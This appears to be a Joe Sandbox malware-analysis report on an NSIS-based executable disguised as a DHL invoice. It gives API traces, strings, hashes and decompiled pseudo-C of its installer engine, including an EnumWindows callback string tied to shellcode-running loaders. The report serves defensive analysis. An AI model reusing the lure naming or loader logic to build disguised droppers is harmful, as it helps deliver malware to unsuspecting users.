Part of subcall function 00405E1E: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00405E26
Part of subcall function 00405E1E: GetLastError.KERNEL32 ref: 00405E30

OleUninitialize.OLE32(00000000), ref: 00403BEF
ExitProcess.KERNEL32 ref: 00403C06
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403C1C
OpenProcessToken.ADVAPI32(00000000), ref: 00403C23
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C38
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C5B
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C80

Part of subcall function 004065F6: CharNextW.USER32(?,004038BC,"C:\Users\user\Desktop\DHL_#U53d1#U7968.exe",?,"C:\Users\user\Desktop\DHL_#U53d1#U7968.exe",00000000), ref: 0040660C

Strings

.tmp, xrefs: 00403AE2
1033, xrefs: 00403A22
C:\Users\user\AppData\Local\Temp\, xrefs: 004039B0, 004039B5, 004039CB, 004039D7, 004039E6, 004039F3, 004039FF, 00403A07, 00403AC3, 00403AD8, 00403AE7, 00403AF6, 00403B09, 00403B1E, 00403BD6
\Temp, xrefs: 004039D2
TMP, xrefs: 00403A08
NSIS Error, xrefs: 00403862
"C:\Users\user\Desktop\DHL_#U53d1#U7968.exe", xrefs: 00403878, 004038AE, 004038B6, 00403A44, 00403A50
Low, xrefs: 004039EE
C:\Users\user\Desktop\DHL_#U53d1#U7968.exe, xrefs: 00403B83
user32::EnumWindows(i r1 ,i 0), xrefs: 00403B45
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403708
SeShutdownPrivilege, xrefs: 00403C32
TEMP, xrefs: 00403A00
Error launching installer, xrefs: 00403A6F
C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 004039A0, 00403A8F, 00403B29, 00403B37
C:\Users\user\Desktop, xrefs: 00403AF1, 00403B32
UXTHEME, xrefs: 004037F0, 004037F5, 004037FB
~nsu, xrefs: 00403ABE
C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang, xrefs: 00403A9A

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\DHL_#U53d1#U7968.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mnstring$C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_#U53d1#U7968.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu
API String ID: 1152188737-655380972
Opcode ID: a525dd75b22903d4bd79fbaf6cc3fb9b74ee5543d4fcd6c254fdcda9163020fa
Instruction ID: bd20618887128fe8ff831b6fc98b417d690d9367272f1fc6873584cad7b34aa2
Opcode Fuzzy Hash: a525dd75b22903d4bd79fbaf6cc3fb9b74ee5543d4fcd6c254fdcda9163020fa
Instruction Fuzzy Hash: 00D134B12043116AE7207F659C46B2B3AACAB4474EF41453FF586B62D2D7BC9D40CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404B30 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00404B30() {
				struct HMENU__* _t63;
				WCHAR* _t64;
				int _t68;
				void* _t76;
				signed int _t78;
				short _t79;
				short _t80;
				int _t82;
				void* _t97;
				intOrPtr _t100;
				long _t114;
				struct HWND__* _t128;
				struct HWND__* _t130;
				struct HWND__* _t131;
				unsigned int _t132;
				int _t135;
				long _t136;
				int _t138;
				signed int _t140;
				short* _t141;
				int _t144;
				int _t148;
				void* _t149;
				long _t150;
				void* _t151;
				long _t152;
				void* _t153;

				_t128 =  *0x4349e8;
				_t136 =  *(_t153 + 0x64);
				if(_t136 != 0x110) {
					if(_t136 != 0x405) {
						if(_t136 != 0x111) {
							if(_t136 != 0x404) {
								if(_t136 != 0x7b ||  *(_t153 + 0x68) != _t128) {
									L14:
									return E0040575B(_t136,  *(_t153 + 0x6c),  *(_t153 + 0x6c));
								} else {
									_t144 = 0;
									_t148 = SendMessageW(_t128, 0x1004, 0, 0);
									 *(_t153 + 0x64) = _t148;
									if(_t148 <= 0) {
										L37:
										return 0;
									}
									_t63 = CreatePopupMenu();
									_push(0xffffffe1);
									_push(0);
									 *(_t153 + 0x70) = _t63;
									_t64 = E00405EBA();
									_t138 = 1;
									AppendMenuW( *(_t153 + 0x74), 0, 1, _t64);
									_t132 =  *(_t153 + 0x6c);
									_t135 = _t132;
									_t68 = _t132 >> 0x10;
									if(_t132 == 0xffffffff) {
										GetWindowRect(_t128, _t153 + 0x10);
										_t135 =  *(_t153 + 0x10);
										_t68 =  *(_t153 + 0x14);
									}
									if(TrackPopupMenu( *(_t153 + 0x80), 0x180, _t135, _t68, _t144,  *(_t153 + 0x64), _t144) == _t138) {
										 *(_t153 + 0x28) = _t144;
										 *(_t153 + 0x34) = 0x42bd48;
										 *((intOrPtr*)(_t153 + 0x38)) = 0x1000;
										do {
											_t148 = _t148 - 1;
											_t138 = _t138 + 2 + SendMessageW(_t128, 0x1073, _t148, _t153 + 0x20);
										} while (_t148 != 0);
										OpenClipboard(_t144);
										EmptyClipboard();
										_t149 = GlobalAlloc(0x42, _t138 + _t138);
										 *(_t153 + 0x64) = _t149;
										_t76 = GlobalLock(_t149);
										_t150 =  *(_t153 + 0x64);
										_t140 = _t76;
										do {
											 *(_t153 + 0x34) = _t140;
											_t78 = SendMessageW(_t128, 0x1073, _t144, _t153 + 0x20);
											_t141 = _t140 + _t78 * 2;
											_t79 = 0xd;
											 *_t141 = _t79;
											_t80 = 0xa;
											 *((short*)(_t141 + 2)) = _t80;
											_t140 = _t141 + 4;
											_t144 = _t144 + 1;
										} while (_t144 < _t150);
										_t151 =  *(_t153 + 0x60);
										GlobalUnlock(_t151);
										_push(_t151);
										_t82 = 0xd;
										SetClipboardData(_t82, ??);
										CloseClipboard();
									}
									goto L37;
								}
							}
							if( *0x4349ec == 0) {
								ShowWindow( *0x4349f8, 8);
								if( *0x435acc == 0) {
									E00405D3A( *((intOrPtr*)( *0x42dd4c + 0x34)), 0);
								}
								_push("true");
							} else {
								 *0x42bd44 = 2;
								_push(0x78);
							}
							E00405958();
							goto L14;
						}
						if( *(_t153 + 0x68) == 0x403) {
							ShowWindow( *0x4349e4, 0);
							ShowWindow(_t128, 8);
							E00405503(_t128);
						}
						goto L14;
					}
					_t97 = CreateThread(0, 0, E00405864, GetDlgItem( *(_t153 + 0x6c), 0x3ec), 0, _t153 + 0x64); // executed
					CloseHandle(_t97); // executed
					goto L14;
				}
				 *(_t153 + 0x34) =  *(_t153 + 0x34) | 0xffffffff;
				 *(_t153 + 0x20) = 2;
				 *((intOrPtr*)(_t153 + 0x24)) = 0;
				 *((intOrPtr*)(_t153 + 0x2c)) = 0;
				 *((intOrPtr*)(_t153 + 0x30)) = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t100 =  *0x435a10;
				_t152 =  *(_t100 + 0x5c);
				 *(_t153 + 0x70) =  *(_t100 + 0x60);
				 *0x4349e4 = GetDlgItem( *(_t153 + 0x64), 0x403);
				 *0x4349c8 = GetDlgItem( *(_t153 + 0x64), 0x3ee);
				_t130 = GetDlgItem( *(_t153 + 0x64), 0x3f8);
				 *0x4349e8 = _t130;
				E00405503( *0x4349e4);
				 *0x4349cc = E00405835(4);
				 *0x4349d0 = 0;
				GetClientRect(_t130, _t153 + 0x10);
				 *(_t153 + 0x28) =  *((intOrPtr*)(_t153 + 0x18)) - GetSystemMetrics(2);
				SendMessageW(_t130, 0x1061, 0, _t153 + 0x20); // executed
				SendMessageW(_t130, 0x1036, 0x4000, 0x4000); // executed
				if(_t152 >= 0) {
					SendMessageW(_t130, 0x1001, 0, _t152);
					SendMessageW(_t130, 0x1026, 0, _t152);
				}
				_t114 =  *(_t153 + 0x68);
				if(_t114 >= 0) {
					SendMessageW(_t130, 0x1024, 0, _t114);
				}
				_push( *((intOrPtr*)( *(_t153 + 0x6c) + 0x30)));
				_push(0x1b);
				E0040551A( *(_t153 + 0x68));
				if(( *0x435a0c & 0x00000003) != 0) {
					ShowWindow( *0x4349e4, 0);
					if(( *0x435a0c & 0x00000002) != 0) {
						 *0x4349e4 = 0;
					} else {
						ShowWindow(_t130, 8);
					}
					E00405503( *0x4349c8);
				}
				_t131 = GetDlgItem( *(_t153 + 0x64), 0x3ec);
				SendMessageW(_t131, 0x401, 0, 0x75300000);
				if(( *0x435a0c & 0x00000004) != 0) {
					SendMessageW(_t131, 0x409, 0,  *(_t153 + 0x68));
					SendMessageW(_t131, 0x2001, 0, _t152);
				}
				goto L37;
			}

0x00404b34
0x00404b3d
0x00404b47
0x00404cdf
0x00404d2b
0x00404d5c
0x00404da7
0x00404d0d
0x00000000
0x00404db7
0x00404db7
0x00404dc7
0x00404dc9
0x00404dcf
0x00404ee5
0x00000000
0x00404ee5
0x00404dd5
0x00404ddb
0x00404ddd
0x00404dde
0x00404de2
0x00404dea
0x00404df1
0x00404df7
0x00404e00
0x00404e03
0x00404e07
0x00404e0f
0x00404e15
0x00404e19
0x00404e19
0x00404e39
0x00404e3f
0x00404e43
0x00404e4b
0x00404e53
0x00404e57
0x00404e69
0x00404e6b
0x00404e70
0x00404e76
0x00404e88
0x00404e8b
0x00404e8f
0x00404e95
0x00404e99
0x00404e9b
0x00404e9f
0x00404eab
0x00404eb3
0x00404eb6
0x00404eb7
0x00404ebc
0x00404ebd
0x00404ec1
0x00404ec4
0x00404ec5
0x00404ec9
0x00404ece
0x00404ed4
0x00404ed7
0x00404ed9
0x00404edf
0x00404edf
0x00000000
0x00404e39
0x00404da7
0x00404d65
0x00404d82
0x00404d8f
0x00404d9b
0x00404d9b
0x00404da0
0x00404d67
0x00404d67
0x00404d71
0x00404d71
0x00404d73
0x00000000
0x00404d73
0x00404d37
0x00404d47
0x00404d4c
0x00404d4f
0x00404d4f
0x00000000
0x00404d37
0x00404d00
0x00404d07
0x00000000
0x00404d07
0x00404b4d
0x00404b56
0x00404b68
0x00404b6c
0x00404b70
0x00404b74
0x00404b7e
0x00404b7f
0x00404b80
0x00404b81
0x00404b82
0x00404b87
0x00404b8d
0x00404b9c
0x00404bac
0x00404bb9
0x00404bbb
0x00404bc1
0x00404bcd
0x00404bd8
0x00404bde
0x00404bfc
0x00404c08
0x00404c17
0x00404c1b
0x00404c25
0x00404c2f
0x00404c2f
0x00404c31
0x00404c37
0x00404c41
0x00404c41
0x00404c47
0x00404c4a
0x00404c50
0x00404c5c
0x00404c65
0x00404c72
0x00404c7f
0x00404c74
0x00404c77
0x00404c77
0x00404c8b
0x00404c8b
0x00404ca5
0x00404cad
0x00404cb6
0x00404cc8
0x00404cd2
0x00404cd2
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00404B91
GetDlgItem.USER32(?,000003EE), ref: 00404BA1
GetClientRect.USER32(00000000,?), ref: 00404BDE
GetSystemMetrics.USER32(00000002), ref: 00404BE6
SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404C08
SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404C17
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C25
SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C2F

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C41
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C65
ShowWindow.USER32(00000000,00000008), ref: 00404C77
GetDlgItem.USER32(?,000003EC), ref: 00404C99
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404CAD
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CC8
SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CD2
ShowWindow.USER32(00000000), ref: 00404D47
ShowWindow.USER32(?,00000008), ref: 00404D4C
GetDlgItem.USER32(?,000003F8), ref: 00404BB1

Part of subcall function 00405503: SendMessageW.USER32(00000028,?,?,00405338), ref: 00405511

GetDlgItem.USER32(?,000003EC), ref: 00404CF2
CreateThread.KERNEL32(00000000,00000000,Function_00005864,00000000), ref: 00404D00
CloseHandle.KERNELBASE(00000000), ref: 00404D07
ShowWindow.USER32(00000008), ref: 00404D82
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404DC1
CreatePopupMenu.USER32 ref: 00404DD5
AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DF1
GetWindowRect.USER32(?,?), ref: 00404E0F
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E31
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E60
OpenClipboard.USER32(00000000), ref: 00404E70
EmptyClipboard.USER32 ref: 00404E76
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E82
GlobalLock.KERNEL32(00000000), ref: 00404E8F
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EAB
GlobalUnlock.KERNEL32(?), ref: 00404ECE
SetClipboardData.USER32(0000000D,?), ref: 00404ED9
CloseClipboard.USER32 ref: 00404EDF

Strings

Preblesses Setup: Installing, xrefs: 00404E43

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
String ID: Preblesses Setup: Installing
API String ID: 2901622961-3179584722
Opcode ID: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
Instruction ID: b8a9fdf254180bfaf0004a99ba51f40fd9d2112bd445e4f5698f4cfe216f0b8a
Opcode Fuzzy Hash: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
Instruction Fuzzy Hash: 45A1BEB1604304BBE720AF61DD89F9B7FA9FFC4754F00092AF645A62E1C7789840CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040154A Relevance: 38.9, APIs: 17, Strings: 5, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040154A(void* _a4) {
				char _v548;
				struct _WIN32_FIND_DATAW _v596;
				void* _v620;
				void* _v624;
				void* _v638;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				int _v652;
				WCHAR* _v656;
				short _v660;
				short _v664;
				RECT* _v668;
				int _v672;
				struct _FILETIME _v680;
				int _v684;
				int _v688;
				signed int _v692;
				void _v696;
				int _v700;
				int _v704;
				int _v708;
				RECT* _v712;
				char _v716;
				signed int _v720;
				RECT* _v724;
				signed int _v728;
				WCHAR* _v732;
				WCHAR* _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				void* _v752;
				WCHAR* _v756;
				intOrPtr _v760;
				WCHAR* _v764;
				void* _v768;
				WCHAR* _v776;
				void* _v784;
				void* _v792;
				void* _v796;
				signed int _t453;
				char _t457;
				signed int _t459;
				signed int _t461;
				char* _t463;
				int _t466;

				_t459 = 7;
				_v700 =  *0x4349f8;
				memcpy( &_v696, _a4, _t459 << 2);
				_t461 = _v692;
				_t463 = L"user32::EnumWindows(i r1 ,i 0)";
				_t453 = _v688;
				_v652 = _t461;
				_v704 = _t463 + (_t461 << 0xb);
				 *0x40b104 =  &_v692;
				_t466 = _v696 + 0xfffffffe;
				_v716 = 0;
				_v708 = _t466;
				_v668 = _t453;
				_v712 = _t463 + (_t453 << 0xb);
				if(_t466 > 0x43) {
					L391:
					_t457 = _v716;
					L392:
					 *0x435ac8 =  *0x435ac8 + _t457;
					L393:
					return 0;
				}
				switch( *((intOrPtr*)(_v708 * 4 +  &M00402EBA))) {
					case 0:
						return _t461;
					case 1:
						_push(0);
						_push(__ecx);
						goto L4;
					case 2:
						 *0x4349ec =  *0x4349ec + 1;
						__eflags = __edx;
						if(__edx != 0) {
							PostQuitMessage(0);
						}
						goto L5;
					case 3:
						E004030FD(__ecx) = __eax - 1;
						_push(0);
						return __eax;
					case 4:
						_push(0);
						_push(__ecx);
						goto L10;
					case 5:
						__eax = E00403002(0);
						0 = 1;
						__eflags = __eax - 1;
						__ecx =  >  ? __eax : 1;
						Sleep( >  ? __eax : 1);
						goto L391;
					case 6:
						__eax = SetForegroundWindow(__edx);
						goto L391;
					case 7:
						__edx =  *0x4349e4;
						__esi = ShowWindow;
						__eflags = __edx;
						if(__edx != 0) {
							__eax = ShowWindow(__edx, __eax); // executed
							__ecx = _v692;
						}
						__eax =  *0x4349e8;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = ShowWindow(__eax, __ecx); // executed
						}
						goto L391;
					case 8:
						__eax = E0040303E(__edx, 0xfffffff0);
						__eax = SetFileAttributesW(__eax, _v692);
						goto L27;
					case 9:
						__edi = E0040303E(__edx, 0xfffffff0);
						__eax = E00406BC5(__edi);
						__ebx = _v724;
						__esi = __eax;
						__eflags = __esi;
						if(__esi == 0) {
							L41:
							__eflags = _v688;
							_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
							if(_v688 == 0) {
								_push(0xfffffff5);
								goto L10;
							} else {
								_push(0xffffffe6);
								E00405D3A() = E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Cirkusprogrammet\\Lovgivningers\\Wolfgang", __edi);
								__eax = SetCurrentDirectoryW(__edi); // executed
								__eflags = __eax;
								if(__eax == 0) {
									_v716 = 0;
								}
								goto L391;
							}
						} else {
							goto L30;
						}
						L31:
						__eflags = _v684;
						if(_v684 == 0) {
							goto L34;
						}
						__eax = E004064FC();
						__eflags = __eax;
						if(__eax != 0) {
							__eax = E00405E3E(__edi); // executed
							L35:
							__eflags = __eax;
							if(__eax == 0) {
								L39:
								 *__esi = __bp;
								__esi = __esi + 2;
								__eflags = __bp;
								if(__bp != 0) {
									L30:
									__esi = E004065F6(__esi, 0x5c);
									__eax = 0;
									__ebp =  *__esi & 0x0000ffff;
									 *__esi = __ax;
									__eflags = __bp;
									if(__bp != 0) {
										goto L34;
									}
									goto L31;
								} else {
									_v716 = __ebx;
									goto L41;
								}
							}
							__eflags = __eax - 0xb7;
							if(__eax != 0xb7) {
								L38:
								__ebx =  &(__ebx[0]);
								__eflags = __ebx;
								goto L39;
							}
							__eax = GetFileAttributesW(__edi); // executed
							__eflags = __al & 0x00000010;
							if((__al & 0x00000010) != 0) {
								goto L39;
							}
							goto L38;
						}
						L34:
						__eax = E00405E1E(__edi);
						goto L35;
					case 0xa:
						__eax = E0040303E(__edx, 0);
						__eax = E004065CF(__eax);
						goto L176;
					case 0xb:
						__eax = _v684;
						__eflags = _v684;
						if(__eflags > 0) {
							__eax =  *(0x435a80 + __ecx * 4);
							 *(0x435ac0 + __ecx * 4) =  *(0x435a80 + __ecx * 4);
						} else {
							if(__eflags == 0) {
								__eax =  *(0x435ac0 + __ecx * 4);
								 *(0x435a80 + __ecx * 4) =  *(0x435ac0 + __ecx * 4);
							}
							0 = E00403002("true");
							__eax = _v692;
							 *(0x435ac0 + _v692 * 4) = __ecx;
						}
						goto L391;
					case 0xc:
						__ecx = _v684;
						_push(4);
						__edx =  *(0x435ac0 + __ecx * 4);
						__edx = __edx & _v680.dwLowDateTime;
						 *(0x435ac0 + __ecx * 4) = __edx & _v680.dwLowDateTime;
						__eax = 0;
						__eflags = __edx;
						_pop(__ecx);
						 ==  ? 0 : 0 =  *((intOrPtr*)(__esp + ( ==  ? 0 : 0) + 0x28));
						return  *((intOrPtr*)(__esp + ( ==  ? 0 : 0) + 0x28));
					case 0xd:
						_push( *((intOrPtr*)(0x435ac0 + __eax * 4)));
						goto L20;
					case 0xe:
						__esi = E0040303E(__edx, 0xffffffd0);
						__edi = E0040303E(__edx, 0xffffffdf);
						__eax = E0040303E(__edx, 0x13);
						__eax = MoveFileW(__esi, __edi);
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = _v684;
							if(_v684 == 0) {
								goto L28;
							}
							__eax = E004065CF(__esi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L28;
							} else {
								__eax = E0040623D(__esi, __edi);
								_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
								_push(0xffffffe4);
								goto L10;
							}
						} else {
							_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
							_push(0xffffffe3);
							L10:
							__eax = E00405D3A();
							goto L391;
						}
					case 0xf:
						__edi = E0040303E(__edx, 0);
						__eax =  &_v716;
						__eax = GetFullPathNameW(__edi, 0x400, __esi,  &_v716);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = _v712;
							__eflags = __eax - __edi;
							if(__eax <= __edi) {
								L57:
								__ebx = _v716;
								L58:
								__eflags = _v684 - __ebp;
								if(_v684 == __ebp) {
									__eax = GetShortPathNameW(__esi, __esi, 0x400);
								}
								goto L392;
							}
							__eflags =  *__eax - __bp;
							if( *__eax == __bp) {
								goto L57;
							}
							__eax = E004065CF(__edi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L52;
							} else {
								__eflags = __eax;
								__eax = E00406B1A(_v712, __eax);
								goto L57;
							}
						}
						L52:
						0 = 1;
						__eax = 0;
						 *__esi = __ax;
						goto L58;
					case 0x10:
						__eax = E0040303E(__edx, 0xffffffff);
						__ecx =  &_v656;
						__eax = SearchPathW(0, __eax, 0, 0x400, __edi,  &_v656);
						__eflags = __eax;
						if(__eax != 0) {
							goto L391;
						}
						goto L61;
					case 0x11:
						__eax = E0040303E(__edx, 0xffffffef);
						__eax = E00406A56(__ecx, __edi, __eax); // executed
						goto L27;
					case 0x12:
						__eax = E0040303E(__edx, 0x31);
						__ebx = _v696;
						__esi = __eax;
						__ebx = _v696 & 0x00000007;
						_v708 = __esi;
						_v716 = __ebx;
						__eax = E00406E03(__esi);
						__edi = L"Call";
						_push(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E00406B1A(__edi, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Cirkusprogrammet\\Lovgivningers\\Wolfgang");
							__eax = lstrcatW(__eax, ??);
						} else {
							_push(__edi);
							__eax = E00406B1A();
						}
						__eax = E00406D3D(__edi);
						__esi = 0;
						__esi = 1;
						__eflags = 1;
						do {
							__eflags = __ebx - 3;
							if(__ebx < 3) {
								L71:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00406B9D(__edi);
								}
								__eax = 0;
								__eflags = __ebx - __esi;
								0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
								__eax = E0040691B(__edi, 0x40000000, (__eflags != 0) + 1);
								_v720 = __eax;
								__eflags = __eax - 0xffffffff;
								if(__eax != 0xffffffff) {
									__esi = _v704;
									__eax = E00405D3A(0xffffffea, __esi);
									__ebx = _v716;
									 *0x435af4 =  *0x435af4 + 1;
									__eax = E00403148(_v692, __ebx, __ebp, __ebp);
									 *0x435af4 =  *0x435af4 - 1;
									__eflags = _v704 - 0xffffffff;
									_v732 = __eax;
									if(_v704 != 0xffffffff) {
										L83:
										 &_v680 = SetFileTime(0,  &_v680, __ebp,  &_v680); // executed
										L84:
										__eax = CloseHandle(__ebx); // executed
										__eax = _v708;
										__eflags = __eax;
										if(__eax >= 0) {
											goto L391;
										}
										__eflags = __eax - 0xfffffffe;
										if(__eax != 0xfffffffe) {
											_push(0xffffffee);
											_push(__edi);
											__eax = E00405EBA();
										} else {
											_push(0xffffffe9);
											_push(__edi);
											E00405EBA() = lstrcatW(__edi, __esi);
										}
										_push(0x200010);
										_push(__edi);
										goto L89;
									}
									__eflags = _v680.dwHighDateTime - 0xffffffff;
									if(_v680.dwHighDateTime == 0xffffffff) {
										goto L84;
									}
									goto L83;
								} else {
									__eflags = __ebx;
									if(__ebx != 0) {
										__esi = _v704;
										__eax = E00405D3A(0xffffffe2, _v704);
										__ebx = 0;
										__eflags = _v720 - 2;
										goto L80;
									}
									goto L75;
								}
							}
							__eax = E004065CF(__edi);
							__ecx = __ebp;
							__eflags = __eax;
							if(__eax != 0) {
								__ecx =  &_v680;
								__eax =  &(__eax[0xa]);
								__eflags = __eax;
								0 = __eax;
							}
							__ebx =  &(__ebx[0xffffffffffffffff]);
							__ebx = __ebx | 0x80000000;
							__ebx = __ebx & __ecx;
							__ebx =  ~__ebx;
							asm("sbb ebx, ebx");
							__ebx =  &(__ebx[0]);
							__eflags = __ebx;
							_v712 = __ebx;
							goto L71;
							L75:
							E00406B1A("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp", L"user32::EnumWindows(i r1 ,i 0)") = E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", __edi);
							_push(_v688);
							_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
							E00405EBA() = E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", "C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp");
							_v724 = _v724 >> 3;
							__eax = E00406AA8("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll", _v724 >> 3);
							__eax = __eax - 4;
							__eflags = __eax;
						} while (__eax == 0);
						__eax = __eax - 1;
						__eflags = __eax;
						if(__eax == 0) {
							 *0x435ac8 =  *0x435ac8 + 1;
							goto L393;
						}
						_push(__edi);
						_push(0xfffffffa);
						L4:
						__eax = E00405D3A();
						goto L5;
					case 0x13:
						_push(0);
						goto L91;
					case 0x14:
						__eax = E0040303E(__edx, 0x31);
						__eax = E00406AA8(__eax, _v696);
						__eflags = __eax;
						if(__eax == 0) {
							goto L28;
						}
						__eflags = __eax - _v684;
						if(__eax == _v684) {
							goto L122;
						}
						__eflags = __eax - _v680.dwHighDateTime;
						if(__eax != _v680.dwHighDateTime) {
							goto L391;
						}
						__eax = _v672;
						return _v672;
					case 0x15:
						_push(0xfffffff0);
						L91:
						E0040303E(__edx) = E00406719(__eflags, __eax, _v692);
						goto L391;
					case 0x16:
						__eax = E0040303E(__edx, "true");
						__eax = lstrlenW(__eax);
						goto L98;
					case 0x17:
						0 = E00403002(2);
						__esi = __edx;
						__ebp = E00403002(3);
						__eax = E0040303E(__edx, "true");
						_v712 = __eax;
						__eax = lstrlenW(__eax);
						__ecx = 0;
						__eflags = __esi;
						 *__edi = __cx;
						__ebx =  ==  ? __eax : __ebx;
						__eflags = __ebx;
